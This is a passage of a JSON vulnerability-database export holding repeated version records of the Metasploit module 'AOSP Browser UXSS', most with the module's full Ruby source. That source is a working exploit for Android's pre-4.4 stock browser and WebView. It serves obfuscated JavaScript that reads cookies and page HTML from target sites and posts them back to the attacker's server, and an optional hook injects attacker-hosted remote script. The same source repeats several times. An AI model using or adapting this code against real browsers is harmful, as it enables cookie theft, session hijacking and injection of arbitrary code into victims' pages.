document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": 
"https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T23:27:42", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T08:43:30", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2019-02-12T08:43:30"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to 
inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + 
datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T08:43:30", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T10:43:45", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}], "modified": "2019-02-12T10:43:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T10:43:45", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform 
(AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T10:55:23", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T10:55:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current 
source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 
'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n 
else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T10:55:23", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T12:55:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T12:55:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of 
Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 
'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T12:55:42", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": 
"7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T03:40:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": "2019-02-21T03:40:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": 
"https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T03:40:42", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T05:40:31", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": 
"2019-02-21T05:40:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => 